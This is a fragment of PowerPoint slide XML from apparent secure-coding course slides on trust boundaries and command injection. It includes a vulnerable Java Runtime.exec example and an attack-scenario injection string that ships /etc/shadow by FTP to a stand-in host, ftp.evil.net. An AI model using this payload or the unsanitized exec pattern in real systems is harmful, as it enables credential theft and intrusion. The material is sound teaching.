            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Necessarily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted to some extent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="3669489"/>
            <a:ext cx="3505200" cy="426618"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -106243"/>
              <a:gd name="adj2" fmla="val -122423"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both trusted &amp; untrusted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangular Callout 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4572000"/>
            <a:ext cx="2205968" cy="426618"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -152101"/>
              <a:gd name="adj2" fmla="val 193"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trust level ??</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangular Callout 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="6019800"/>
            <a:ext cx="8382000" cy="409592"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23819"/>
              <a:gd name="adj2" fmla="val -83272"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obviously untrusted. But how can you distinguish this from other cases?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372591454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3" grpId="0" animBg="1"/>
      <p:bldP spid="14"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Trust Boundaries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Software often contains multiple components &amp; libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each component may operate in one or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted domains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that are determined by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>required resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Component A can access file-system, but lacks any network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Component B has general network access, but lacks access to the file-system and the secure network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Component C can access a secure network, but lacks access to the file-system and the general network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2906877382"/>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Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Command injection can occur when an improperly sanitized string is passed across a trust boundary.  For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String dir = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.getProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("dir"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Process proc = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rt.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  new String[] {"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "-c", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> " + dir}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This code violates rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>IDS07-J. Do not pass untrusted, unsanitized data to the Runtime.exec() method </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1431559829"/>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Attack Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The program is running with root privileges and the attacker provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the following string for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bogus ; printf "user anonymous dummy \n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>put /etc/shadow shadow.txt \n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>quit" | ftp -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ftp.evil.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Group 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="2133600"/>
            <a:ext cx="2667000" cy="1600200"/>
            <a:chOff x="152400" y="2133600"/>
            <a:chExt cx="2667000" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3276600"/>
              <a:ext cx="1143000" cy="457200"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="Straight Connector 6"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="4" idx="0"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="800100" y="2918430"/>
              <a:ext cx="685800" cy="358170"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="2133600"/>
              <a:ext cx="2667000" cy="784830"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" lvl="0" indent="-173038" algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="25000"/>
                </a:spcAft>
                <a:buSzPct val="70000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>dummy directory </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" lvl="0" indent="-173038" algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="25000"/>
                </a:spcAft>
                <a:buSzPct val="70000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>to make </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" kern="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ls</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t> happy</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="78" name="Group 77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1371600" y="2133600"/>
            <a:ext cx="2994789" cy="1600200"/>
            <a:chOff x="1371600" y="2133600"/>
            <a:chExt cx="2994789" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3276600"/>
              <a:ext cx="228600" cy="457200"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:tabLst>
                  <a:tab pos="292100" algn="l"/>
                  <a:tab pos="571500" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                </a:rPr>
